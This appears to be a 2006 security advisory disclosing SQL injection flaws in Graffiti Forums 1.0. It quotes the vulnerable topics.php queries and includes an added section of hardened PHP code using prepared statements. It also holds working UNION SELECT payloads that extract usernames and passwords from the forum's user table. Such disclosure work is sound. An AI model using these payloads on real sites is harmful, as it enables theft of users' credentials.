Graffiti Forums v1.0 SQL Injection Vulnerabilities



/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST] - Advisory #24 - 08/07/06
--------------------------------------------------------
Program: Graffiti Forums
Homepage: http://www.bluedojo.com/
Vulnerable Versions: 1.0
Risk: High!
Impact: Critical Risk

-==Graffiti Forums v1.0 SQL Injection Vulnerabilities==-
---------------------------------------------------------

- Description
---------------------------------------------------------
This forum uses PHP, MySQL, and Java and is very easy to install. It lets people draw pictures on a graffiti "wall" instead
of posting text messages as in traditional forums.

- Tested
---------------------------------------------------------
localhost

- Exploitation
---------------------------------------------------------

1)

Vulnerable code:

==[ topics.php 8-11 ]===========================
[...]
$sql = "SELECT forum FROM graffiti_forums WHERE id=$f";
$result = mysql_query($sql);
$sql_row = mysql_fetch_row($result);
$forum_title = $sql_row[0];
[...]
==[ end topics.php ]===========================

As we can see, there is no protection at all for the $f value used in the SQL query (not even against single quotes). Note also
that the script does not work with register_globals off.

So we can put something like this in the $f variable:
2 UNION SELECT password as forum FROM graffiti_users

The SQL query then looks like this:

SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as forum FROM graffiti_users

Here, 2 is a valid forum id. Using some ORDER BY clauses you can get different things... check it out.

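As an added example that is not part of the original advisory or the vendor's code, here is how both topics.php queries of this advisory (the forum title lookup in 1) above and the topic listing in 2) below) can be hardened: the forum id is read explicitly from the request, validated as a positive integer, and bound as a parameter with mysqli prepared statements instead of being concatenated into the SQL text. The connection credentials are placeholders; the table and column names are those shown in the advisory.

```php
<?php
// Added example, not the vendor's code: hardened versions of the two
// topics.php queries. Assumes a mysqli connection to the forum database
// (placeholder credentials below) and the table/column names in the advisory.
// Read the forum id explicitly from the request (no register_globals) and
// accept only a positive integer; "2 UNION SELECT ..." is rejected outright.
function forumIdFromRequest(array $get): ?int
{
    $id = filter_var($get['f'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The id is bound as an integer parameter, never spliced into the SQL text,
// so nothing can be appended to the statement.
function forumTitle(mysqli $db, int $f): ?string
{
    $stmt = $db->prepare('SELECT forum FROM graffiti_forums WHERE id = ?');
    $stmt->bind_param('i', $f);
    $stmt->execute();
    $stmt->bind_result($title);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? $title : null;
}

function forumTopics(mysqli $db, int $f): array
{
    $stmt = $db->prepare('SELECT id, topic FROM graffiti_topics WHERE id_forum = ?');
    $stmt->bind_param('i', $f);
    $stmt->execute();
    $stmt->bind_result($id, $topic);
    $topics = [];
    while ($stmt->fetch()) {
        $topics[] = ['id' => $id, 'topic' => $topic];
    }
    $stmt->close();
    return $topics;
}

$db = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'DB_NAME'); // placeholders
$f = forumIdFromRequest($_GET);
if ($f === null) {
    http_response_code(400);
    exit('invalid forum id');
}
$forum_title = forumTitle($db, $f);
foreach (forumTopics($db, $f) as $row) {
    echo htmlspecialchars($row['topic'], ENT_QUOTES, 'UTF-8') . "\n"; // escape on output as well
}
```

The old mysql_* extension used by the script has no parameter binding at all, so if the code base cannot be moved to mysqli or PDO, the minimum fix is to cast $f to an integer before it reaches the query string.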
=0D
2)
==[ topics.php 21-32 ]===========================
[...]
if (!$option){
	$sql = "SELECT id, topic FROM graffiti_topics WHERE id_forum=" . $f;
	if ($result = mysql_query($sql)){
		echo("
");
		while ($sql_row = mysql_fetch_row($result)){
			echo("");
			echo("
");
			$id = $sql_row[0];
			$topic = $sql_row[1];
			echo("");
			echo("  $topic");
			echo("");
[...]
==[ end topics.php ]===========================

The SQL query in this code has the same bug. Exploitation is very similar to the first one:

topics.php?f=2 UNION SELECT password as topic, username as id FROM graffiti_users

The final SQL query looks like this:

SELECT id, topic FROM graffiti_topics WHERE id_forum=2 UNION SELECT password as topic, username as id FROM graffiti_users

Here, 2 is a valid forum id. Again you can play with some ORDER BY or GROUP BY clauses.


Practically all the SQL queries in this script are vulnerable to SQL injection, so I am not going to keep digging through this
cave of bugs.

Attention: the magic_quotes_gpc PHP flag has to be off (no filtering of backslashes, single quotes and double quotes). Also
remember that the script does not work with register_globals off.


- How to fix it? More information?
--------------------------------------------------------
Visit our forum to learn how to fix it or to get more information.
http://www.neosecurityteam.net/foro/

- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=24

- Credits
--------------------------------------------------------
Discovered by Paisterist -> paisterist.nst [at] gmail [dot] com

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/


- Greets
--------------------------------------------------------
HaCkZaTaN
K4P0
Daemon21
Link
0m3gA_x
LINUX
m0rpheus

Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!

/* EOF */
